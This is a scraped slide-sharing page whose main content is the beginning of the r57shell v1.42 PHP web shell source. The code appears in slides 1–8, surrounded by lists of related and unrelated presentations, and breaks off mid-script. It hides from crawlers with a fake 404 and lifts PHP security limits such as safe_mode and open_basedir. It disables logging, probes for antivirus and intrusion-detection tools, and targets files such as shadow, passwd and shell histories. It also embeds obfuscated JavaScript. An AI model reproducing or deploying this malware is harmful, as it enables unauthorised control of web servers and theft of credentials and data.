Models and Service Layers, Hemoglobin and HobgoblinsModels and Service Layers, Hemoglobin and Hobgoblins
Models and Service Layers, Hemoglobin and HobgoblinsRoss Tuck
 
PHP tips and tricks
PHP tips and tricks PHP tips and tricks
PHP tips and tricks Damien Seguy
 
Gta v savegame
Gta v savegameGta v savegame
Gta v savegamehozayfa999
 
php plus mysql
php plus mysqlphp plus mysql
php plus mysqlJayson de Leon
 
Php 101: PDO
Php 101: PDOPhp 101: PDO
Php 101: PDOJeremy Kendall
 
Database Design Patterns
Database Design PatternsDatabase Design Patterns
Database Design PatternsHugo Hamon
 
international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretssmueller_sandsmedia
 
The History of PHPersistence
The History of PHPersistenceThe History of PHPersistence
The History of PHPersistenceHugo Hamon
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersIan Barber
 
Shell.php
Shell.phpShell.php
Shell.phpDado Antik
 
Inc
IncInc
IncLax Sindikat
 
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Masahiro Nagano
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4Federico Damián Lozada Mosto
 
Symfony2 - extending the console component
Symfony2 - extending the console componentSymfony2 - extending the console component
Symfony2 - extending the console componentHugo Hamon
 
Object Calisthenics Applied to PHP
Object Calisthenics Applied to PHPObject Calisthenics Applied to PHP
Object Calisthenics Applied to PHPGuilherme Blanco
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsGuilherme Blanco
 
PhpUnit - The most unknown Parts
PhpUnit - The most unknown PartsPhpUnit - The most unknown Parts
PhpUnit - The most unknown PartsBastian Feder
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQLSanketkumar Biswas
 
Adding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy ApplicationsAdding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy ApplicationsSam Hennessy
 
Php
PhpPhp
PhpLinh Tran
 
You code sucks, let's fix it
You code sucks, let's fix itYou code sucks, let's fix it
You code sucks, let's fix itRafael Dohms
 
Smelling your code
Smelling your codeSmelling your code
Smelling your codeRaju Mazumder
 
PHP Data Objects
PHP Data ObjectsPHP Data Objects
PHP Data ObjectsWez Furlong
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitmfrost503
 
R57php 1231677414471772-2
R57php 1231677414471772-2R57php 1231677414471772-2
R57php 1231677414471772-2ady36
 
C A S Sample Php
C A S Sample PhpC A S Sample Php
C A S Sample PhpJH Lee
 
R57.Php
R57.PhpR57.Php
R57.Phpguest63876e
 

Más contenido relacionado

La actualidad más candente

international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretssmueller_sandsmedia
 
The History of PHPersistence
The History of PHPersistenceThe History of PHPersistence
The History of PHPersistenceHugo Hamon
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersIan Barber
 
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Masahiro Nagano
 
Symfony2 - extending the console component
Symfony2 - extending the console componentSymfony2 - extending the console component
Symfony2 - extending the console componentHugo Hamon
 
Object Calisthenics Applied to PHP
Object Calisthenics Applied to PHPObject Calisthenics Applied to PHP
Object Calisthenics Applied to PHPGuilherme Blanco
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsGuilherme Blanco
 
PhpUnit - The most unknown Parts
PhpUnit - The most unknown PartsPhpUnit - The most unknown Parts
PhpUnit - The most unknown PartsBastian Feder
 
Adding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy ApplicationsAdding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy ApplicationsSam Hennessy
 
You code sucks, let's fix it
You code sucks, let's fix itYou code sucks, let's fix it
You code sucks, let's fix itRafael Dohms
 
PHP Data Objects
PHP Data ObjectsPHP Data Objects
PHP Data ObjectsWez Furlong
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitmfrost503
 

La actualidad más candente (19)

international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secrets
 
The History of PHPersistence
The History of PHPersistenceThe History of PHPersistence
The History of PHPersistence
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
 
Shell.php
Shell.phpShell.php
Shell.php
 
Inc
IncInc
Inc
 
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4
 
Symfony2 - extending the console component
Symfony2 - extending the console componentSymfony2 - extending the console component
Symfony2 - extending the console component
 
Object Calisthenics Applied to PHP
Object Calisthenics Applied to PHPObject Calisthenics Applied to PHP
Object Calisthenics Applied to PHP
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object Calisthenics
 
PhpUnit - The most unknown Parts
PhpUnit - The most unknown PartsPhpUnit - The most unknown Parts
PhpUnit - The most unknown Parts
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Adding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy ApplicationsAdding Dependency Injection to Legacy Applications
Adding Dependency Injection to Legacy Applications
 
Php
PhpPhp
Php
 
You code sucks, let's fix it
You code sucks, let's fix itYou code sucks, let's fix it
You code sucks, let's fix it
 
Smelling your code
Smelling your codeSmelling your code
Smelling your code
 
PHP Data Objects
PHP Data ObjectsPHP Data Objects
PHP Data Objects
 
Mocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnitMocking Dependencies in PHPUnit
Mocking Dependencies in PHPUnit
 

Similar a PHP_SHELL_OPTIMIZED

R57php 1231677414471772-2
R57php 1231677414471772-2R57php 1231677414471772-2
R57php 1231677414471772-2ady36
 
C A S Sample Php
C A S Sample PhpC A S Sample Php
C A S Sample PhpJH Lee
 
perl usage at database applications
perl usage at database applicationsperl usage at database applications
perl usage at database applicationsJoe Jiang
 
Drupal Development (Part 2)
Drupal Development (Part 2)Drupal Development (Part 2)
Drupal Development (Part 2)Jeff Eaton
 
Advanced php testing in action
Advanced php testing in actionAdvanced php testing in action
Advanced php testing in actionJace Ju
 
Virtual Madness @ Etsy
Virtual Madness @ EtsyVirtual Madness @ Etsy
Virtual Madness @ EtsyNishan Subedi
 
Unit testing with zend framework tek11
Unit testing with zend framework tek11Unit testing with zend framework tek11
Unit testing with zend framework tek11Michelangelo van Dam
 
Unit testing with zend framework PHPBenelux
Unit testing with zend framework PHPBeneluxUnit testing with zend framework PHPBenelux
Unit testing with zend framework PHPBeneluxMichelangelo van Dam
 
How to write code you won't hate tomorrow
How to write code you won't hate tomorrowHow to write code you won't hate tomorrow
How to write code you won't hate tomorrowPete McFarlane
 
Extbase and Beyond
Extbase and BeyondExtbase and Beyond
Extbase and BeyondJochen Rau
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shellady36
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)Dennis Knochenwefel
 
jQuery: out with the old, in with the new
jQuery: out with the old, in with the newjQuery: out with the old, in with the new
jQuery: out with the old, in with the newRemy Sharp
 
Good Evils In Perl (Yapc Asia)
Good Evils In Perl (Yapc Asia)Good Evils In Perl (Yapc Asia)
Good Evils In Perl (Yapc Asia)Kang-min Liu
 
Internationalizing CakePHP Applications
Internationalizing CakePHP ApplicationsInternationalizing CakePHP Applications
Internationalizing CakePHP ApplicationsPierre MARTIN
 
Introduction to Zend Framework web services
Introduction to Zend Framework web servicesIntroduction to Zend Framework web services
Introduction to Zend Framework web servicesMichelangelo van Dam
 

Similar a PHP_SHELL_OPTIMIZED (20)

R57php 1231677414471772-2
R57php 1231677414471772-2R57php 1231677414471772-2
R57php 1231677414471772-2
 
C A S Sample Php
C A S Sample PhpC A S Sample Php
C A S Sample Php
 
R57.Php
R57.PhpR57.Php
R57.Php
 
perl usage at database applications
perl usage at database applicationsperl usage at database applications
perl usage at database applications
 
Drupal Development (Part 2)
Drupal Development (Part 2)Drupal Development (Part 2)
Drupal Development (Part 2)
 
Advanced php testing in action
Advanced php testing in actionAdvanced php testing in action
Advanced php testing in action
 
Virtual Madness @ Etsy
Virtual Madness @ EtsyVirtual Madness @ Etsy
Virtual Madness @ Etsy
 
Php functions
Php functionsPhp functions
Php functions
 
Unit testing with zend framework tek11
Unit testing with zend framework tek11Unit testing with zend framework tek11
Unit testing with zend framework tek11
 
Unit testing with zend framework PHPBenelux
Unit testing with zend framework PHPBeneluxUnit testing with zend framework PHPBenelux
Unit testing with zend framework PHPBenelux
 
PHP POWERPOINT SLIDES
PHP POWERPOINT SLIDESPHP POWERPOINT SLIDES
PHP POWERPOINT SLIDES
 
How to write code you won't hate tomorrow
How to write code you won't hate tomorrowHow to write code you won't hate tomorrow
How to write code you won't hate tomorrow
 
Extbase and Beyond
Extbase and BeyondExtbase and Beyond
Extbase and Beyond
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shell
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
 
Daily notes
Daily notesDaily notes
Daily notes
 
jQuery: out with the old, in with the new
jQuery: out with the old, in with the newjQuery: out with the old, in with the new
jQuery: out with the old, in with the new
 
Good Evils In Perl (Yapc Asia)
Good Evils In Perl (Yapc Asia)Good Evils In Perl (Yapc Asia)
Good Evils In Perl (Yapc Asia)
 
Internationalizing CakePHP Applications
Internationalizing CakePHP ApplicationsInternationalizing CakePHP Applications
Internationalizing CakePHP Applications
 
Introduction to Zend Framework web services
Introduction to Zend Framework web servicesIntroduction to Zend Framework web services
Introduction to Zend Framework web services
 

Último

Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...
Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...
Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...DhatriParmar
 
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Association for Project Management
 
Mental Health Awareness - a toolkit for supporting young minds
Mental Health Awareness - a toolkit for supporting young mindsMental Health Awareness - a toolkit for supporting young minds
Mental Health Awareness - a toolkit for supporting young mindsPooky Knightsmith
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptxmary850239
 
Measures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataMeasures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataBabyAnnMotar
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvRicaMaeCastro1
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxweek 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxJonalynLegaspi2
 
How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17Celine George
 
Narcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfNarcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfPrerana Jadhav
 
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptx
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptxMan or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptx
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptxDhatriParmar
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseCeline George
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDhatriParmar
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxSayali Powar
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxUnraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxDhatriParmar
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 

Último (20)

Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...
Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...
Blowin' in the Wind of Caste_ Bob Dylan's Song as a Catalyst for Social Justi...
 
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
 
Mental Health Awareness - a toolkit for supporting young minds
Mental Health Awareness - a toolkit for supporting young mindsMental Health Awareness - a toolkit for supporting young minds
Mental Health Awareness - a toolkit for supporting young minds
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx
 
Measures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataMeasures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped data
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxweek 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptx
 
How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17
 
Narcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfNarcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdf
 
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptx
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptxMan or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptx
Man or Manufactured_ Redefining Humanity Through Biopunk Narratives.pptx
 
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptxINCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 Database
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
prashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Professionprashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Profession
 
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxUnraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 

PHP_SHELL_OPTIMIZED

  • 1. <?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");} $language='eng'; $auth = 0; $name=''; $pass=''; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,'ru_RU.cp1251'); @ini_restore("safe_mode"); @ini_restore("open_basedir"); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 2. @ini_set('allow_url_fopen',1); } else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); } error_reporting(E_ALL); /* ??? ????? */ $userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); $danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); $downloaders = array('wget','fetch','lynx','links','curl','get'); /* ??? ?????? ???????? ???? ????? realpath() */ //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.01234567890"; $chars_rlph = "abcdefghijklnmopqrstuvwxyz"; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 3. $presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php' ,'config.inc.php', 'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin', 'security','php.ini','cdrom','root', 'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf ','accounting.log','home','htdocs', 'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi- bin','html','robots.txt','billing'); /************************************************************************************************ ******/ define("starttime",@getmicrotime()); if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; set_magic_quotes_runtime(0); @set_time_limit(0); if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); } else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 4. $safe_mode = @ini_get('safe_mode'); #if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; $version = '1.42'; if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 5. exit("<h1>Access Denied</h1>"); } } if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '<select name=tempdir><option value="./">./</option>'; foreach( $tempdirs as $item) { if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;} } $select_tempdir .= '</select>'; setcookie('tempdir',$tempdir); setcookie('select_tempdir',$select_tempdir); }else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir']; } $head = ' <html> <head> <title>r57shell v.1.42 - Edited By KingDefacer</title> <script type="text/javascript" language="javascript"> <!-- ML=":<=t/ilcha9 neprsf.wj>o"; MI="1@7?5>3;@?72833>044CCCB7::@8=66B5<AF49BD@E14@7?5>3E"; OT=""; for(j=0;j<MI.length;j++){ OT+=ML.charAt(MI.charCodeAt(j)-48); }document.write(OT); // --></script> file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } .table1 { BORDER: 0px; BACKGROUND-COLOR: #D4D0C8; color: #000000; } .td1 { BORDER: 0px; font: 7pt Verdana; color: #000000; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 7. .tr1 { BORDER: 0px; color: #000000; } table { BORDER: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; color: #000000; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000;; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 8. submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; color: #000000; } textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; color: #000000; } BODY { margin: 1px; color: #000000; background-color: #e4e0d8; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language='javascript'> function hide_div(id) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
